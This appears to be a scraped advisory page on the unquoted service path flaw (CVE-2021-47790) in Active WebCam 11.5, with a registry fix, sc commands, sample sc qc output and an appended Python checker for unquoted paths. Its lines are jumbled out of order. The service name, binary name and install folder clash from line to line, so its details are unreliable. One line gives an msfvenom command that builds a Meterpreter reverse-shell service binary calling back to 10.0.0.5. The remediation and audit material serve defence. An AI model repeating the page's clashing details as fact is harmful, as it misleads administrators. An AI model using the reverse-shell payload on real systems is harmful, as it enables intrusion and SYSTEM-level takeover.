April 12, 2026 Security Severity: Medium (Privilege Escalation)
You can verify the fix by running this command in an elevated CMD: sc qc ACTIVEWEBCAM (Exploit-DB)
Active WebCam 11.5 - Unquoted Service Path | Advisories 14 Jan 2026 —
If an official patch is unavailable or cannot be immediately deployed, system administrators can manually patch Active Webcam 11.5 by modifying the Windows Registry.
(Note: The space after binpath= is mandatory for the command to execute properly.)
Verification and Prevention
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveWebcamService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Active Webcam\SimvWebcam.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Active Webcam Video Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Broader Implications for Enterprise Security
C:\Program.exe (with Files\Active Webcam\webcam.exe as an argument)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe-service -o Active.exe
C:\Program
Active Webcam 11.5 (developed by PY Software) contains a high-risk security vulnerability known as an Unquoted Service Path. This flaw is officially tracked as CVE-2021-47790 and was first publicly documented in September 2021 (Exploit-DB).
Vulnerability Overview: CVE-2021-47790
sc config "ActiveWebcamService" binpath= "\"C:\Program Files\Active Webcam\WebcamService.exe\""
Comprehensive vulnerability metadata and reference list available at
Remediation & Patching
C:\Program.exe (with Files\Active WebCam\WebCamService.exe passed as an argument)
Look at the BINARY_PATH_NAME output. A successfully patched service will display the path wrapped in explicit quotes:
Windows interprets spaces as potential ends to a command. If an attacker places a malicious file at C:\Program.exe, Windows may execute it instead of the intended program. A local attacker can gain SYSTEM-level privileges.
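An audit check for the behaviour described above, as an added example that is not part of the original page: it reads BINARY_PATH_NAME from `sc qc` output and lists the paths an administrator should inspect for unexpected files and loose write permissions. The function names are hypothetical and both `sc qc` samples are constructed from the service name and path used in the fix command.

```python
import re

# Constructed sample `sc qc` output: unquoted path (before the fix).
UNPATCHED = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ActiveWebcamService
        BINARY_PATH_NAME   : C:\Program Files\Active Webcam\WebcamService.exe
        SERVICE_START_NAME : LocalSystem
"""

# Constructed sample `sc qc` output: quoted path (after the fix).
PATCHED = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ActiveWebcamService
        BINARY_PATH_NAME   : "C:\Program Files\Active Webcam\WebcamService.exe"
        SERVICE_START_NAME : LocalSystem
"""


def binary_path(sc_qc_output):
    """Return the BINARY_PATH_NAME value from `sc qc` output, or None."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.*?)\s*$", sc_qc_output, re.M)
    return m.group(1) if m else None


def ambiguous_prefixes(path):
    """Paths Windows may try first, in order, when the service path is unquoted.

    An empty list means the path is quoted or has no space in its executable part.
    """
    if path.startswith('"'):
        return []
    # The executable part ends at the first ".exe"; the rest is arguments.
    m = re.match(r"(.*?\.exe)\b", path, re.I)
    exe = m.group(1) if m else path
    parts = exe.split(" ")
    # Every space-delimited prefix, with ".exe" appended, is tried before the real binary.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


if __name__ == "__main__":
    for label, output in (("unpatched", UNPATCHED), ("patched", PATCHED)):
        hits = ambiguous_prefixes(binary_path(output))
        print(label, "-> VULNERABLE, check:" if hits else "-> OK", hits)
```
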